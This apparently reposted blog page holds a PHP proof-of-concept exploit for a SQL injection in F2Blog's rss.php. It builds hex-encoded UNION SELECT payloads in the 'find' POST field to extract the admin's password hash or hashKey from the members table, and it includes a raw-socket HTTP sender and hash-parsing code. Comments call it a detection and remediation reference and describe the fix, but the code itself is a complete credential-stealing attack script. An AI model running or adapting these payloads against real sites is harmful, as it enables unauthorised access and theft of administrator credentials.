• f2blog最新注射漏洞


    <?php
    /*
     * Legacy proof-of-concept (pre-PHP-7 era) for a SQL injection in F2Blog's rss.php:
     * the `find` POST field is concatenated into the feed query, so a crafted value can
     * UNION extra columns of f2blog_members into the RSS output.
     *
     * Retained as a detection/remediation reference. The request it builds is the
     * access-log signature: a POST to rss.php?cateID=1 whose body starts with
     * "find=and 1=2 union select ...", sent with a fixed MSIE 6.0 User-Agent and
     * "Accept-Language: zh-cn". Because every string literal in the payload is
     * hex-encoded, the payload contains no quote characters; quote-based filtering
     * alone would not catch it. The application-side fix is to bind `find` as a
     * query parameter (or restrict it to search characters) instead of interpolating
     * it into SQL.
     *
     * CLI arguments are positional: $argv[1] = host, $argv[2] = base path, $argv[3] = mode.
     * Uses ereg() and the preg `e` modifier, both gone since PHP 7, so the script does
     * not run on current PHP. The banner below was originally multi-line; the line
     * breaks were lost in the copy this page was taken from.
     */
    print_r(" +------------------------------------------------------------------+ Exploit For F2Blog All Version Just For Fun :) +------------------------------------------------------------------+ ");
    ini_set("max_execution_time",0); // no CLI time limit: send() blocks until the server closes the socket
    error_reporting(7);              // E_ERROR | E_WARNING | E_PARSE only; notices (e.g. a missing $argv[3]) are hidden
    $blogpath="$argv[2]";            // base path of the blog, prepended verbatim to the request path in send()
    $server="$argv[1]";              // target host: both the TCP endpoint and the Host header
    $cookie='';                      // always empty; rss.php is reached without a session
    $useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)";
    $type=$argv[3];                  // mode; compared loosely below, so a missing value or "0" both select the first branch
    // Probe payload: each of the nine UNIONed columns is the hex literal for "we love shell",
    // role=0x61646D696E is "admin" hex-encoded, and the trailing /* comments out the
    // remainder of the original query.
    $cmd="find=and 1=2 union select 0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C from f2blog_members where role=0x61646D696E/*";
    echo "Testting...:\t";
    $response=send($cmd,'rss.php?cateID=1');
    // Marker reflected in the feed means the injected SELECT ran. This is a truthiness
    // check on strpos(); offset 0 cannot occur because send() prefixes the response with "<pre>".
    if(strpos($response,'we love shell')) { echo "Vul\r\n"; }
    echo "Now Crack the admin\r\n\r\n";
    // Mode 0 reads the hashKey column, any other mode the password column. In both cases
    // the value is taken from the CDATA sections of the returned RSS and accepted only if
    // is_hash() recognises it.
    if($type==0){
        $cmd="find=and 1=2 union select hashKey,hashKey,hashKey,hashKey,hashKey,hashKey,hashKey,hashKey,hashKey from f2blog_members where role=0x61646D696E/*";
        $response=send($cmd,'rss.php?cateID=1');
        // The `e` modifier is stray here (it only ever applied to preg_replace); PHP 7+ rejects it.
        preg_match_all('/\[CDATA\[(.+)\]\]/ie',$response,$matches);
        // Outer reverse moves the capture-group list to index 0; inner reverse makes
        // $matches[0] the *last* CDATA capture in the document.
        $matches=array_reverse($matches);
        $matches=array_reverse($matches[0]);
        if(is_hash($matches[0])) { echo "hash:\t"; die(print_r($matches[0])); }
        die("Exploit Failed\r\n");
    }
    else{
        $cmd="find=and 1=2 union select password,password,password,password,password,password,password,password,password from f2blog_members where role=0x61646D696E/*";
        $response=send($cmd,'rss.php?cateID=1');
        // Same extraction as the hashKey branch; see the comments above.
        preg_match_all('/\[CDATA\[(.+)\]\]/ie',$response,$matches);
        $matches=array_reverse($matches);
        $matches=array_reverse($matches[0]);
        if(is_hash($matches[0])) { echo "password:\t"; die(print_r($matches[0])); }
        die("Exploit Failed\r\n");
    }
    // True when $hash (trimmed) begins with 32 lowercase hex characters, i.e. an
    // MD5-sized digest. ereg() is case-sensitive and was removed in PHP 7.
    function is_hash($hash) { if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} else {return false;} }
    // Sends a hand-built HTTP/1.1 POST of $cmd to $blogpath.$path over a plain TCP socket
    // on port 80 (no TLS, no return-value check on fsockopen). Returns the raw response
    // (status line and headers included) wrapped in <pre> tags. Despite the Keep-Alive
    // header it reads until the server closes the connection. $count and $evilip are
    // imported but never used; $debug is never assigned in this script, so the debug echo
    // is dead. The CRLF appended after the body is not counted in Content-length.
    function send($cmd,$path) {
        global $blogpath,$server,$cookie,$count,$useragent,$debug,$evilip;
        $path=$blogpath."$path";
        $message = "POST ".$path." HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Referer: http://".$server.$path."\r\n"; // Referer points at the target itself, presumably to resemble an in-site request
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: ".$useragent."\r\n";
        $message .= "Host: ".$server."\r\n";
        $message .= "Content-length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Keep-Alive\r\n";
        $message .= "Cookie: ".$cookie."\r\n";
        $message .= "\r\n";
        $message .= $cmd."\r\n";
        // echo $message;
        $fd = fsockopen( $server, 80 );
        fputs($fd,$message);
        $resp = "<pre>";
        while($fd&&!feof($fd)) { $resp .= fread($fd,1024); }
        fclose($fd);
        $resp .="</pre>";
        if($debug) {echo $cmd;echo $resp;}
        // echo $resp;
        return $resp;
    }
    ?>
  • 原文地址:https://www.cnblogs.com/adodo1/p/4326997.html